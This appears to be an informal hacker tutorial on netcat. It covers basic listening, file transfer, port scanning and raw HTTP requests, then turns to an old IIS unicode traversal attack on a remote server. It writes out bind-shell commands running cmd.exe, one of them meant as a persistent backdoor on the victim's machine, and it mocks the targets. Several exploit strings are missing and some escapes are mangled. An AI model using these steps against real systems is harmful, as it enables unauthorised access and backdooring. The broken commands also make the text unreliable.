Petting Your Netcat
They call it the TCP swiss army knife for a reason. Near the top of any
reputable security tool list, netcat appears to be timeless, and
eternally useful. It was coded for a more abstract purpose: to supply
users with a frontend for various networking tasks. It also boasts a
rather large learning curve. That's where I come in.
Basic Netcat Operation
Here's an example to kind of get you into the 'netcat mood'. Pop open
two shells. In the first shell, we will start netcat like this:
$nc -l -p 100
And in the second window:
$nc 127.0.0.1 100
Now, in the first one, we have supplied the -l flag. This tells netcat to
listen for incoming connections. We specify the port to listen on with
the -p flag, in this case port #100.
In the second window, we tell netcat to connect to the same machine,
using the loopback address 127.0.0.1, on port 100.
Now try typing in some random text in the second window. When you
hit enter, the data is sent to the instance of netcat listening on port
100, running in the first window, and that instance of netcat pipes it to
STDOUT (A.K.A. prints it on the screen). (You can also do the same
with the first window, and it will appear in the second).
Let's setup a very primitive FTP server on our machine via netcat. This
is really just a very poor way to transfer a file from one host to
another. Open up two windows. In the first:
$nc -l -p 21 > a.txt
And in the second window:
$cat b.txt | netcat 127.0.0.1 21
We print the contents of b.txt and pipe it to netcat, which transfers it
to the other instance of netcat. This instance is told to redirect (via >)
any input to the file specified, a.txt.
While on the topic of creating cheap knockoffs of popular daemons,
let's create a bad telnet-type server for Windows XP, since these are
incredibly hard to find (and even harder for me to pay for. Ugh.)
We can start our "telnet server" on a machine, 192.168.0.100:
C:\WINDOWS> nc -l -p 1337 -e cmd.exe
You are familar with -l and -p (notice our choice of port!) but what is
with -e? Well, -e specifies what program to run for the user after they
connect. In this case, cmd.exe so we get an elite command line. Now,
we can connect to the machine using the 'telnet' program built into
Windows XP (the client host this time):
C:\WINDOWS> telnet 192.168.0.100 1337
Port-Scanning with Netcat
Nmap is a thing of the past. Well not really, but you'll feel so much
cooler using netcat to do your port scanning from now on. Quite
$nc -w 1 -z 127.0.0.1 10-50
This will try to connect to each port on your computer from 10 to 50.
The -w flag is supplied to specify the timeout for the connection, in
seconds. It's one second, in case you couldn't figure that one out.
The -z flag is used for "zero I/O" mode. Netcat's manpage
recommends that this be supplied if you're scanning.
Browsing the Web with Netcat
You can use netcat in case for some reason you are lacking your
browser, feel like reading raw HTML code, want to look cool, or some
combination of the three. How?
echo -e "GET www.google.com HTTP/1.0nn" | nc -w 5 www.google.com 80
Netcat connects to google.com on port 80 (timeout of 5 seconds) and
then bash pipes that HTTP GET request string to it. This will return the
HTML code for the page located at www.google.com. Not quite sure
why you would want this, but oh well.
Since you asked, I'm going to show you a simple type of IIS exploit
that is used in many netcat seminars, if there is such a thing. This was
patched like two years ago, but it's lots of fun nontheless.
First up, start netcat:
$nc -v -n 184.108.40.206 80
Where of course the IP address is the IIS Server's IP and 80 is the
standard port for TCP/HTTP. The -v option makes it more verbose
(more output w00t) and -n means that we are giving it a numeric IP
address only, as opposed to a domain or something.
Now once it connects, type this and hit enter:
This will get a standard HTTP banner. But wait! It also does a 'dir c:\',
which lists the contents of C:\, Windows' version of /.
Now let's upload netcat to their pathetic unpatched asses. Or if you're
not a big binary-fetish man, we can just use their server instead.
$nc -v -n 220.127.116.11 80
Now let's use netcat to create a backdoor. Remember our pseudo-
telnet server? We want to run this on the netcat on their server.
nc -L -p 1337 -d -e cmd.exe
-L (not -l, -L) tells netcat to wait for connections without closing. -d
Tells it to detach (d for detach) from the process we want it to run).
If we convert that command to a unicode URL it looks like this:
Run that on their machine the same way you ran everything else - by
appending it to the end of the cmd.exe?/ thing. If you can't figure that
out...you'd better reread this.
There's really a load of stuff you can do to mess with them. Transfer a
file to their computer? Figure that one out, you can put it together
from previous usage examples in this article.
So now you know netcat is really much more useful than you thought,
eh? For further reading, I'd like to direct you to the following:
The netcat manpage
The netcat readme file
Where do I get it?